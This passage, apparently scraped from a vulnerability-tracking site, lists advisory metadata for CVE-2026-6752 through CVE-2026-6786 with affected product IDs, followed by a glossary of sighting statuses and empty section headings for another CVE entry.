      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6751"
    },
    {
      "cve": "CVE-2026-6752",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6752"
    },
    {
      "cve": "CVE-2026-6753",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6753"
    },
    {
      "cve": "CVE-2026-6754",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6754"
    },
    {
      "cve": "CVE-2026-6755",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6755"
    },
    {
      "cve": "CVE-2026-6756",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6756"
    },
    {
      "cve": "CVE-2026-6757",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6757"
    },
    {
      "cve": "CVE-2026-6758",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6758"
    },
    {
      "cve": "CVE-2026-6759",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6759"
    },
    {
      "cve": "CVE-2026-6760",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6760"
    },
    {
      "cve": "CVE-2026-6761",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6761"
    },
    {
      "cve": "CVE-2026-6762",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6762"
    },
    {
      "cve": "CVE-2026-6763",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6763"
    },
    {
      "cve": "CVE-2026-6764",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6764"
    },
    {
      "cve": "CVE-2026-6765",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6765"
    },
    {
      "cve": "CVE-2026-6766",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6766"
    },
    {
      "cve": "CVE-2026-6767",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6767"
    },
    {
      "cve": "CVE-2026-6768",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6768"
    },
    {
      "cve": "CVE-2026-6769",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6769"
    },
    {
      "cve": "CVE-2026-6770",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6770"
    },
    {
      "cve": "CVE-2026-6771",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6771"
    },
    {
      "cve": "CVE-2026-6772",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6772"
    },
    {
      "cve": "CVE-2026-6773",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6773"
    },
    {
      "cve": "CVE-2026-6774",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6774"
    },
    {
      "cve": "CVE-2026-6775",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6775"
    },
    {
      "cve": "CVE-2026-6776",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6776"
    },
    {
      "cve": "CVE-2026-6777",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6777"
    },
    {
      "cve": "CVE-2026-6778",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6778"
    },
    {
      "cve": "CVE-2026-6779",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6779"
    },
    {
      "cve": "CVE-2026-6780",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6780"
    },
    {
      "cve": "CVE-2026-6781",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6781"
    },
    {
      "cve": "CVE-2026-6782",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6782"
    },
    {
      "cve": "CVE-2026-6783",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6783"
    },
    {
      "cve": "CVE-2026-6784",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6784"
    },
    {
      "cve": "CVE-2026-6785",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6785"
    },
    {
      "cve": "CVE-2026-6786",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6786"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33626 (GCVE-0-2026-33626)

FKIE_CVE-2026-33626

GHSA-6W67-HWM5-92MQ

Summary

Affected Versions

Vulnerable Code

Root Cause

Attack Scenario

Proof of Concept

Verified Exploitation Result

Impact

Recommended Fix

Credit

WID-SEC-W-2026-1228

Tags

Sightings

Nomenclature